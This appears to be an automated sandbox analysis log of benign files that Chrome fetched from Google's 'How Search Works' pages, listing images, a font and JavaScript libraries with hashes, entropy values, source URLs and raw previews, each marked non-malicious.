                                                                                                                                                                                                                                                                                          Preview:.PNG........IHDR...x...x.....9d6.....pHYs.................sRGB.........gAMA......a.....IDATx...=N[A...cH"P.R*......l.%x!I.A.....(BKI..D..@F...5.g.3..#.s..wl...L^...V...,....,....,....,...>Y.....{|gg.'...6...|...M...7.........}..6...W.$z.>.?'.....+.'.O...U.....^.]>.'|...f...W..#.8..#...ef.[.j....+X....X....X....X....X\..,.K...:.E.N....~N..b..L....;.2.E....}..C)s_..G`q..G`q..G`q..G`q..G`q..G`q..G`q..G`q..G`q...}...9P..,....,....,.....|6O...t.....(...`.n..ism.v.W.q7.....I..N.'....K4q.....U.L.6..&n;.........^.....H`...=0q}......:.].\.>e.L\.F.&.o........A.......KR`..':0q...8w..u.:kh.*.~g...f.S...p....b"..t....?......N..A.....pbY.V.......W.J.j..#.....L..jG&p.5#...Z...P...n.td.;P22..(......L`grG&.C9#..\...X...vnld.w`Ld.wbhd.wdHdfW;.:..L.8.hq..G`q..G`q..G`q....w..7y^.....7.....IEND.B`.
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          File Type:PNG image data, 52 x 48, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                                                          Size (bytes):724
                                                                                                                                                                                                                                                                                          Entropy (8bit):7.647982860115714
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:12:6v/7hXwUFAPF3m6dO27+7ggN6jyBLIELY1xNs0ZskwxaKCaRZk3upGWYyKZwghc7:eQ93m6NSDBUELozxwffk3omRV8J
                                                                                                                                                                                                                                                                                          MD5:98AF63704F8E80F4B8D0F57DD55A37F4
                                                                                                                                                                                                                                                                                          SHA1:51442B648F619AD638616BDC5FA2409A2A5BF751
                                                                                                                                                                                                                                                                                          SHA-256:B755CDB5F2E731B5A3623A38ACA7F33ECEA11107144120C35348E0BB56DD8367
                                                                                                                                                                                                                                                                                          SHA-512:1394D41A33F4ADC3AF12E2054DB8C133737464C6F8A1FF24C0D927B95F7D38AD8D841A96CE9CE927D879DDCB248FC2C81ABD9989C930BCEAFECC93AA599AA250
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          URL:https://lh3.googleusercontent.com/MMpb9epWItPdMv3YocDIoLXfw3sPI0thusb-XU7tjchshY5_gMgaQ2AQi91LeMGPJVBsQoDU53KqKjqr4vszVbwaGM6gY-27l3I-ML6c_HvJyqnEgA3D=-h48-e365-rwu
                                                                                                                                                                                                                                                                                          Preview:.PNG........IHDR...4...0.....^.Y.....sBIT....|.d.....IDATh..MH.A....FV[k.....R...B...6...."..R..c.;x+.P.......%T..]....2*.(E.LVV.o:l.........=..}.}.a..>A..m......JE...W.......M[y.B........,D.n..;...WP...[...Q]-{;..H."..Q.8TgK...4K...".U.......{B0+..Sn....sP.+..9(J.~..1.....^f!.RA...{..sE.T.ROyq..UI......s.s....;...&.T@ub].c...M!......p.P(.H.u.z(3...{....TK...B.I..'6......'..0.+.......$.....X.j..F=.I.-h#.....$./.&...e......3....C.R..[.`.._x^>..F.....h...OZ.+..M+..s.4.K..=^.G......ln\.5^4.".!F.....?..}7.S....0..[.....{.F......N$.:..B... .|....o....7#d.3.Ai..b1..5...xf.........8.q.M.-..{\....OZ.S.|..S.<....*.D.. /e:.)....C.u"!..\'.r.H.u..-.,.F<..((..s.!.km>f<..9.(,.7.c..H\......IEND.B`.
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          File Type:RIFF (little-endian) data, Web/P image, VP8 encoding, 240x240, Scaling: [none]x[none], YUV color, decoders should clamp
                                                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                                                          Size (bytes):2132
                                                                                                                                                                                                                                                                                          Entropy (8bit):7.876983524213411
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:48:2bv0FWNl2dwKyq0oldB1FdFvS5nRSGhkjK3EmDRXTN:ITFKR9nz+R++X5
                                                                                                                                                                                                                                                                                          MD5:068E32A86688D3D97061DBDF5F4612CA
                                                                                                                                                                                                                                                                                          SHA1:AE6AA370F2AB728F4A53EA4E0404170F84498FE3
                                                                                                                                                                                                                                                                                          SHA-256:15ECCA7D07828AF29A84843B180D60A7984DC933CFD2A1BEFD22AA1179274EF0
                                                                                                                                                                                                                                                                                          SHA-512:E8B5CE44B544F94AE8BCFA7A0E8B23355930EE99698C9CC87A4CC6E3C9F209B48DAC0A90A755CFC843B1431F5851321D96E06514F99296CD5FC63FC344317960
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          URL:https://lh3.googleusercontent.com/OMmSijDU0neu_vZPqLWBrVJsQGT_D0ejrnpIgQMPkTZC-0s9dO6_kbV3sGb2q9BWmpEQDirGidE1rvGwp9BnCPpv0QfzLqnZ-noZLw=s0-rw-e365
                                                                                                                                                                                                                                                                                          Preview:RIFFL...WEBPVP8 @....0...*....>=..D.!..X.. ...p......=yUG.~0./....N...B...o..jo0.......I.Y.....+....P...z.}.?U}W..~.....~...~...........^...r.(../._...j......p....e.S.?...?....k....`O..z........[\..Nmv.X..`,......X..`,......9.X/..P.u{...HbE..*.-....^..X.@>...F/..N...y..`..RM._E}.E....D..0..........Od.#..._t..x.<L......P..(.W..b.......8C|..P.O.6.3...`*..3\.m....^.B..;k....`,......X..`,............$#.t@..M].0.X....:U..E.%m...F.m..]4_..)L.`H.1..`.N.0.-....f..lHb0....(.=.n.E....2...{.K..FC._Z.......!..Oy.Pm...qf.]...)...>.....in`.f.....J.......<2.....S.g..-.t1L.bg..N...ty%....u]..v.t..!m...#.R...V_.6..q......a.`F..?..l...I^.7..g..)..9.;-..#..8.....x2jt.7?.}I...qX%\..t..^o.|.b.[-...v....$./.W.:....j.z.D....:....tx~.LD#q...]1.....T..l......?...S....D.\......_;..&.Uxr..m...s..H&..4..o....tl).....j........$...eb...Jg.}eh..hW..f...e.....D.!...G.m..v.w.Q.n?.8.Y.t..o.S.j..G.....c..:.......T.bw3*/..XCq.Q>$W=.?.v...O.Y.~..1.L.3.?T..8Rt.i.=#f..9y...
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (8143)
                                                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                                                          Size (bytes):12082
                                                                                                                                                                                                                                                                                          Entropy (8bit):5.2555966381964305
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:192:sZWPNSRE7yMrMyTLI4ULe6mMp/GmTwMFGDd/yW7QpuXiYBAt:sZQNSRE7J4yHI4qmMdGiwMF6H7QpuXhg
                                                                                                                                                                                                                                                                                          MD5:C215A840970465B3908303ACA3C72BA0
                                                                                                                                                                                                                                                                                          SHA1:EF86515C51B74C2369AF9875CC73714A76BF3274
                                                                                                                                                                                                                                                                                          SHA-256:195F1E676AC9D3253F0F8F8EE03DA25A9D9797FC257F661810CC9C467CE0292B
                                                                                                                                                                                                                                                                                          SHA-512:8746D6EB040D1419143FF177CA8A8507FD7ABCFDD14427495354D4F19CC97C9391D9767D290DB14DBFEDD1262EDD44E7127175BE12E46D880BBEE539AF3E2A25
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          URL:https://www.google.com/search/howsearchworks/assets/BhmWRCy0.min.js
                                                                                                                                                                                                                                                                                          Preview:import"./vQ8El_Rl.min.js";import"./IniIGeRU.min.js";import"./bS7WqXuL.min.js";import{l as P}from"./_OAi-NRQ.min.js";import{d as C,i as p}from"./HxYQzxVf.min.js";import{c as m}from"./zRFBfJZH.min.js";import{r as S,x as l,A as L,s as W}from"./ycaG4YXp.min.js";import{l as T,e as $}from"./0XPwTFcg.min.js";import{n as o}from"./IYoTYjYE.min.js";import{t as h}from"./ianzD0dL.min.js";import{e as y}from"./p9kcPq91.min.js";import{i as x}from"./IFunn9hk.min.js";import{o as g}from"./5Ss99t85.min.js";import{o as _}from"./RpI-OtYr.min.js";import{R as A}from"./bAPu5B1A.min.js";import"./44SUZn7a.min.js";import"./rwBjrn-0.min.js";import"./lHimDk5Y.min.js";const z=':host{--bds-carousel-scrollbar-height: 30px;--bds-carousel-scrollbar-track-height: 2px;position:relative}bds-pagination::part(pagination-item){cursor:pointer}.feather .left-feather,.feather .right-feather{--feather-width: 20vw ;position:absolute;top:0;height:100%;width:var(--feather-width);z-index:10;display:none}@media (min-width: 3000px){.f
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          File Type:RIFF (little-endian) data, Web/P image, VP8 encoding, 512x314, Scaling: [none]x[none], YUV color, decoders should clamp
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):30084
                                                                                                                                                                                                                                                                                          Entropy (8bit):7.99495992059937
                                                                                                                                                                                                                                                                                          Encrypted:true
                                                                                                                                                                                                                                                                                          SSDEEP:768:HQ50SkQUyHYQkHzxZQNm6rv3znpsXiksT2g2m8pKP57NN:w/ke1s4malwiJT2gfSExN
                                                                                                                                                                                                                                                                                          MD5:15BA41EFDA6C2E360F49434926F86F7A
                                                                                                                                                                                                                                                                                          SHA1:607D4E0D335C6955F1CE12555C8CADA41491DD24
                                                                                                                                                                                                                                                                                          SHA-256:54931B0EC11C4C57FB9A04E1B8D54026973CB61DA91F8C5313E984109A02A516
                                                                                                                                                                                                                                                                                          SHA-512:C45E7DB434C77FF75999FDD8C7BFE2199E27D3BC092FB2E05D08D2830428F5D81F2315DD812D91CAFD91E22EE3ECDA24C367E610F6413E5CA358B9996D4F05CC
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:RIFF|u..WEBPVP8 pu.......*..:.>U$.E#.!....8.D...L.+.. |&....*.....!.?..~3...g.......e}.....o...?.............'.g.....Ow_.......z..V.......7..wo...~r...y. .....................7..>d~g...H.u.....c...>....c._./._..I".._.2..?E...;.W.....?b..zA.c.W|.9w80G...1W.j..o.....U......?&..../Y.%.w...0.IY.E.W\t\.....et9.Lv...B./...:.[.g.Yiw.H.g....S.g.J..5.?m.u....Um\.Z..j..,.?q.....Z....~....o...1...Y.:3....U..k.....=4...r..V}vF.....J....pL.N..Aj..[...8..k.+T...v5ET...!.1n.N......d..2[3.._S.....oo.t...+q ........Ck&.w.It..Vh...E@.......{\...h...b}....*m.~X.h.v-.&..p.Ph....%........T.f...o...Z....lv....@..}.".3c)..6c...+...._3]Q......././.....p...U..(.?.[.4u.......D.....X.d.6c@./..+....8..H/j.......@.FZ."..i..j...N <n\.....w.M...0....z5.<..U.x..a..J.J..#.....Lq.I.i.t.@..u...(..y..l8.......Af.....e.q...M..Vz......,.0...06-@.....'..+0..,......\.S..*..]....y.5..w..h..s.=.@9P:".j;..".1......s.[.v;..l.qw6..'*......yZ......~.P.g%I.x.5...Fs..y...s..t.w.BBC.
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (548)
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):170607
                                                                                                                                                                                                                                                                                          Entropy (8bit):5.400378968347762
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:3072:yMyT/I+HNCTBHhq1hyw0WaLedLpnf26boIfyxCWiZ:yrqBBxLWa69DyxMZ
                                                                                                                                                                                                                                                                                          MD5:51C7EFB4D10E059CADEA0BE0322B420F
                                                                                                                                                                                                                                                                                          SHA1:A4BA6E03BA48A119539E6BE2E05302AC2F1A3C42
                                                                                                                                                                                                                                                                                          SHA-256:B24F4E645DB81EA79BB26791E2C282C5E31AB68900ECAB482B88473BAD2A9B9E
                                                                                                                                                                                                                                                                                          SHA-512:8C61015535FFA73AFE33195E30F66B5798A6AF417EC0C7DBCE145F916911460F24FCC7D5B0F15AE5F97719859807A38E22E9A34DB151900E09762349106ADFD1
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:/*. AngularJS v1.6.10. (c) 2010-2018 Google, Inc. http://angularjs.org. License: MIT.*/.(function(y){'use strict';function qe(a){if(G(a))u(a.objectMaxDepth)&&(Oc.objectMaxDepth=Wb(a.objectMaxDepth)?a.objectMaxDepth:NaN);else return Oc}function Wb(a){return Y(a)&&0<a}function M(a,b){b=b||Error;return function(){var d=arguments[0],c;c="["+(a?a+":":"")+d+"] http://errors.angularjs.org/1.6.10/"+(a?a+"/":"")+d;for(d=1;d<arguments.length;d++){c=c+(1==d?"?":"&")+"p"+(d-1)+"=";var e=encodeURIComponent,f;f=arguments[d];f="function"==typeof f?f.toString().replace(/ \{[\s\S]*$/,""):"undefined"==.typeof f?"undefined":"string"!=typeof f?JSON.stringify(f):f;c+=e(f)}return new b(c)}}function ja(a){if(null==a||Za(a))return!1;if(I(a)||F(a)||z&&a instanceof z)return!0;var b="length"in Object(a)&&a.length;return Y(b)&&(0<=b&&(b-1 in a||a instanceof Array)||"function"===typeof a.item)}function q(a,b,d){var c,e;if(a)if(C(a))for(c in a)"prototype"!==c&&"length"!==c&&"name"!==c&&a.hasOwnProperty(c)&&b.call(d
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (17276)
                                                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                                                          Size (bytes):18500
                                                                                                                                                                                                                                                                                          Entropy (8bit):5.288803063564337
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:384:CEKmt3JtBOgr3CSEVbMtClyCJ4qelm2JDX6r:jv395bO+t7e4qEJDM
                                                                                                                                                                                                                                                                                          MD5:955ABE8CF2E241745BEE38B92BEBC76C
                                                                                                                                                                                                                                                                                          SHA1:414B13E1866A94EAEF2643A5167381BBE2AA7699
                                                                                                                                                                                                                                                                                          SHA-256:09756F2D963931CD3831E019D7DFC7A71DC6EC0E02ED4CF6232C46E3B40A9909
                                                                                                                                                                                                                                                                                          SHA-512:0A8289AE94A67E9262ADBE1198E622B78B01F031713A0C808854EE91A3C2101E3003C61586A7D4B05D5666531B8B5A51DCC8BB53AF5D29FD34C36C17BFEBED51
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          URL:https://www.gstatic.com/external_hosted/scrollmagic/ScrollMagic.min.js
                                                                                                                                                                                                                                                                                          Preview:/** @license ScrollMagic v2.0.6 | (c) 2018 Jan Paepke (@janpaepke) | license & info: http://scrollmagic.io. *. * Copyright (c) 2018 Jan Paepke. *. * Permission is hereby granted, free of charge, to any person obtaining a copy. * of this software and associated documentation files (the "Software"), to deal. * in the Software without restriction, including without limitation the rights. * to use, copy, modify, merge, publish, distribute, sublicense, and/or sell. * copies of the Software, and to permit persons to whom the Software is. * furnished to do so, subject to the following conditions:. *. * The above copyright notice and this permission notice shall be included in. * all copies or substantial portions of the Software.. *. * THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR. * IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,. * FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE. * AUTHORS OR COPYRIGHT HOLDERS
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          File Type:Web Open Font Format (Version 2), TrueType, length 16924, version 1.0
                                                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                                                          Size (bytes):16924
                                                                                                                                                                                                                                                                                          Entropy (8bit):7.985911308777105
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:384:0hfYfOTTunMFD/0c858eussSlggjm48d6bSGyDDo0MPJq7OT4:0hfYoinM50/xpgYmsbTS8Vo7OT4
                                                                                                                                                                                                                                                                                          MD5:DD430E13935BD532D7ECBCC9AA7D8A60
                                                                                                                                                                                                                                                                                          SHA1:2B300570BD6B4B17D4C67DDBC465A8922DE2CFDD
                                                                                                                                                                                                                                                                                          SHA-256:A3DF6DEE7AF91883DEC6523C9B30D14B30375345298B389EEB12567820EB4129
                                                                                                                                                                                                                                                                                          SHA-512:DC59E83EF0199B5262F786D4F621D8A6A097CFD026A6AB5CBFCE48B61B94FD3378799E968A79F738487BE821A75ADE77243B3FA1D816C26947518D8A74AF1356
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          URL:https://fonts.gstatic.com/s/googlesans/v61/4UasrENHsxJlGDuGo1OIlJfC6l_24rlCK1Yo_Iqcsih3SAyH6cAwhX9RPiYUvaYr.woff2
                                                                                                                                                                                                                                                                                          Preview:wOF2......B...........A...........................3..>..X?HVAR.h.`?STAT..'...,/<..... .a....0.\.6.$..8. ..B......n.5.....q..DT.............!....2..F.*.P.,.F.P....e.l.R......w.nS..L...,.2z.#.D.T.o..?w.......@..&.....[.Q.......z....iH.Y.^.gH....PCO..?.l....;25.+*<Bc..><m....f`.FDDD.r.#..q..,...l/..r.J.....3.l:.r..8.BH.#,. .J..q;.........."n.C.M.UD.i..x.[..4dJ"i...mv:.@E...h.;.j...Q.2Pg..Z...}.t..w...^t}.....]U-../.T..W......-..y..>?.....[.1..6Y.......#..J.&.s...x.q.s..T.WH..u.....1.x.cJ.A7....u...[o.n...MkF.).R..A...n~..R(.%$..z*.^.d..2..=.>.t..a..{DX8x2...b.J.....2.......B_..B..tS.3.s.z.UHu./...!6....r....6/9........C....|....P.LY..i<8.#.[....:.s...Xp....E.<..tC.N...p...d>..b.(..$.,\4O1;.L..:...j...y\7.._{......./.....1._2.g..AT@.L.Q.>....V..-k4.r...U|.H......4..X7.`8.p..UT.0.......a....J#"PDDD.^O...27...5....E......)...P.7..0h._..O..+.........7......z.c.. .u...X."&.8 ......B8?..:....H.A!.]..^1...Q.....!.q2C..8y................|..'$.iUqn..e%.|...
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          File Type:RIFF (little-endian) data, Web/P image
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):6494
                                                                                                                                                                                                                                                                                          Entropy (8bit):7.943667670984611
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:192:B/P5bqhhJodzNa1Jd2BizSlAW64RfG6D9hdvSYUk7:BJpKnmPlAgRbd+k7
                                                                                                                                                                                                                                                                                          MD5:08377DCFE868E193EABB464D8D98B586
                                                                                                                                                                                                                                                                                          SHA1:A1FA711B37BABC832EDC6C549B059F69A33BBFB1
                                                                                                                                                                                                                                                                                          SHA-256:8CDF9E5CAA016E221E531E14D41525E34FE2BB57E53F4A9BE8821EB6154E75A1
                                                                                                                                                                                                                                                                                          SHA-512:73930317AA4EFAF8262D3A8FAF523B5512E36464DA6C02151CD770096810EFD313386126E49CB7F8DD175F16DB3B3A86E5C33BA77FF77D3237628A20F39585DB
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:RIFFV...WEBPVP8LJ.../..?...&...0...y./6.P.6.......cT.I.C..... ..\.a....Z..l-...x.s...&6.e...Md+..l...q.w.5.o.mW.m.V.....C.....c..;.{......qT.:J.ev3..k./..?.R.ut3.....}usq....O....9..<KU...|..%._.<.n.r..........E..........1L?.......l-.,.U......K......j].#.z...%e5....0.. G.K..@...tzUzfY...R....].tK.8...z`..]......O?.Rz...c.qs,.............~.~.....3..@.Y.f.c....a...I.H...!..%..f.~...*.[n....z.......|I..NO..c.THg..Xt!._3M.x....k^..cY.v.e-...~X|$...-.S....B?.-..z...{}..1..,A...\...../h.h..z%..T.....r...~.e....z...]...\WkTd}..-}.}K...fM...|........o...o..L.....hm6%....\Gom....1...;6.i..'.I.?N....|.._..5...4.m..q.Z|..|....Y..$CI...X.H`...:..E.....?...Z.E..-un.....K...KuLuN..+.N..HP...6;f.,.:.T.>...}..~.3......G.Hu,..lsS..n....S...f.U.6..O......-....S.......=Q.C(..$.....-.zF..u)6L...\R.b.....$..0.T.VC.7....1..R.\....'...1w....j.emm./....&.?..R...u....g..=8*.R..K*#.K..t...J..w.)..NBrX2%..)(..&..$..lz..X.O[...:.\Ssa.W-..-{l...3...j.
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          File Type:PNG image data, 120 x 120, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                                                          Size (bytes):8005
                                                                                                                                                                                                                                                                                          Entropy (8bit):7.932879807851235
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:192:NqJV3s0+3afbOkpJYFOFrxRA9nvpvAk/RH+h80d4D:ET3KSbpoOFNRw6k/Rehxs
                                                                                                                                                                                                                                                                                          MD5:82F73E47F29A0B0B6EA0AC8A67419E3F
                                                                                                                                                                                                                                                                                          SHA1:CAD2C14184D3EB8CBF94E98EE178362F9D494169
                                                                                                                                                                                                                                                                                          SHA-256:A51842A1727B816A7D5B2C8666EAF8EC5F6C00A60972812E3DB65ED315FDEE77
                                                                                                                                                                                                                                                                                          SHA-512:2D25A171AC3A8496035E38E4E823DF6CBD8CE1C1FC89B36F13EF3E46F5831E1AFAF1D796488BCD70C3DD1D0A489FE6752C01C62225CDD2A321BB53BBC33C83B6
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          URL:https://lh3.googleusercontent.com/4-toCoht-pqFO58Z4u-TFBsGfwuNOORZURXtLloPAEw_87kPa7TKHqFmm3Z7mMO_hi5QWrjpBGqtY9zgr06lOsx3KVezooiNyD8bzJwIHK2UC1bE-RE=h120
                                                                                                                                                                                                                                                                                          Preview:.PNG........IHDR...x...x.....9d6....NeXIfMM.*.................>...........F.(.............................H.......H....o.#.....IDATx..y.l.U..k.sj.u.7.....=.q.1.p....ID...`....bA.%...# .(....DBB$..&)Q.K$ .;.!.......M......T.9g.....T.....k.R}OG...3}{.....'.......>....V./9V./9V./9V./9V./9V./9V./9V./9V./9V./9V./9V./9V./9V./9V./9V./9V./9V./9V./9V./9V./9V./9V./9V./9V./9V./9V./9V./9V./9V./9V./9..~.]..=..#.^.5"._..})"...^.a..Vp..;.....t.4..B0n.........@6.d..L.Q..!..hiL{..s.........`.`A...c.+..........#...-T<..1...!..$...:.6.a....qv..3m.......jK_,..M............kC.I.q.E....8.f.....5.....'....>.......Z...},"...M......7..c.^.....710....:D.k4.5......J.d.M..Y`I.d....%W.?r....O....9w.=f.z.{.}....k.j.8..%_zj.........8f.!..3X.~.....O..\...f......x.a....._J....H.@.".....B..@6-........p.........r...w....7i..]Y...=....ds.V.\...#....t..V.gr;.....O.......h.T.V.0...$..W..........W&b.I..y*......AZ.Y... Y`o.........!S.S4.$.p#.E<..=....L...'....r....L..a:I..&..;....z......Z
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          File Type:PNG image data, 52 x 48, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):748
                                                                                                                                                                                                                                                                                          Entropy (8bit):7.546618611973919
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:12:6v/7ZoxbM6LLc8zy1bgtygfkg1WHfoOxqM1h9+0eQdI05Mjk02xYJspO:moxbMWc8YsWHwOxqMBnKg0dJspO
                                                                                                                                                                                                                                                                                          MD5:6639D32854A5B7CE2F031D30D5E9CFDB
                                                                                                                                                                                                                                                                                          SHA1:6B89647710FBA0D5B8E4EE7E091DA1CB15B6EF9E
                                                                                                                                                                                                                                                                                          SHA-256:92F411A933203556AAC2E0C03740C04EC302188BB04C5DF50C0785EEAA1302B4
                                                                                                                                                                                                                                                                                          SHA-512:B8F3C0756045D66D56271F6AF7FA3D91675C55A50D935E00FAC68CBC0EF4FBBCE7E39515FA49176F05407A86D33784C291BC328EB6672E2021FB0F1A93FA7022
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:.PNG........IHDR...4...0.....^.Y.....sBIT....|.d.....IDATh...K.a..?3nY.%n[D]..M...CJ..^<u....t...cA.{J..7TzR.C..`Y"C..&K..).Z...2Y..3;.2.x.a..>......!!!!..j.. ..N..h.............R....e`...v....(.yK..nH.s`.x.t.7O#X.~..............)PM./..<k..k...`.3..4....OG/..WAV#...:..#.$.r...r.j..f...J.;....;t?.2.g.u.....U.]c.l...:,,...;.PLTv.__'&.P..iQy.b..u.Rtt..,d....[..Nc..H$`m......n.].3._..@....~...j.C.Dl.&'!...)I.1T.BO.h.R).d`xXB1...==.c.DDT...*..J.......O..:..I..80.v%U=......aeEZ}.......Y\..q?3.....YH.a`....................1...-.!....XZ...@..P..H.3.O.6...h.r|;o.$...@".b$..s....!...m.M`....d.l....'.T....&.V.G..7@.^.Y...W\.*}....F...@.............X.F.Q..b........}.....(r.}.XB.1..Y....[.bWBBBBB..?..:3.B......IEND.B`.
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          File Type:PNG image data, 512 x 343, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):330224
                                                                                                                                                                                                                                                                                          Entropy (8bit):7.983137654901116
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:6144:gIgphYIkSBvqWlri4i7XMidorq5gvcCE9oIygj4AvgS/h6F2SIeCy:gIghYyBblrxiLMidorcSc5V4Av/h6cXy
                                                                                                                                                                                                                                                                                          MD5:02D7F917F2C729DEFDF85E85576F3612
                                                                                                                                                                                                                                                                                          SHA1:84B4B710A4F35D3517C048EFA2308F6CA6545335
                                                                                                                                                                                                                                                                                          SHA-256:E48B9AD41BD15F25A6E867B5AD51C48376CE5E2CBCD785674B788F5D7E2E23A3
                                                                                                                                                                                                                                                                                          SHA-512:A8C4B4AA75C06C025600932F33EBBBBD96C3B35F7C21C677F3EC685889F03F9D3B907B70FC7C969B4973D2E010DD9D5047F7115E18B6F75715A3DE971F93A5EF
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:.PNG........IHDR.......W.....[ya....eiCCPicc..H..W.XS...[......... ...Z..R..!.$........k.Q....+ ......bAEY.uQ..7!.]....;...O..3....e.\T..<i.<>2.565.Ez.P...9.....;...@.....n.D._uQq.s....P......8C...A....A ...@T...T..b.9....*...T8C...m..9._.@.......zV. ...?A.&.J.....8H ..!V.>,/o...C...e..x.o.7.Y.........:.~...(d....gi....*.|..F...U......Sa*...XU.!...u.....QIj{.T.....&.nB~..bS.#..1..}F.$..1\-.4I>7.b#........-...._hm.........~U..(s....7b.W....).S .).$.@L..U.....,.sb.l..xU.6.....j~. S..../.S..m.K.1.| _.....vR....].I.I.<"...\...pu..s.4)A..#...W..)..8.=n%.T. .T.$h....pq...LY~\.:N.0.?*N....D....,..-.L..@..Y....G"...A.....f`FJ...>.@!..".P..........<.U?]@f.hA......<......t.[2x.5..x..&..........W..j.5..G..%1..F."F..q.<.....3.6w......=.)....p..F.=I2O.]..A...."..Z.v......!;d...p.=..6..={A-G...*.....7....FF.C.!d..g..^.,.Z.[.u.......|..M....}o.-..bg...9....,..V.].....z........y$.....TUR.V....I=./....x...rI.8.._...+...c........__o.....y..n.%.........x.
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (419)
                                                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                                                          Size (bytes):909
                                                                                                                                                                                                                                                                                          Entropy (8bit):5.16707633624249
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:24:6lJchMN+DYzrkY+MTZ0MGiqzydwLc2ZRJVzV7:nMADYzJ50MGFzyi13JVh7
                                                                                                                                                                                                                                                                                          MD5:EECDE7D18D1E39B471ACAE43DABDAACB
                                                                                                                                                                                                                                                                                          SHA1:018FA862279BC586745F970F498F27773983DE11
                                                                                                                                                                                                                                                                                          SHA-256:4799E2E16AFF754DD947E19463D44AC99B900C47C7F4C0AE5A0437658C1AC85E
                                                                                                                                                                                                                                                                                          SHA-512:DB61B9556BC688B99F922E85B05CFF3DE9C91B79F06D65BEE8C641AED8BC904D049AE45CC1C3BEAA8A5C39286579F6FA4D7332BC7CBD0B868D488DE18E7D4CBE
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          URL:https://www.google.com/search/howsearchworks/assets/v6TSeaUt.min.js
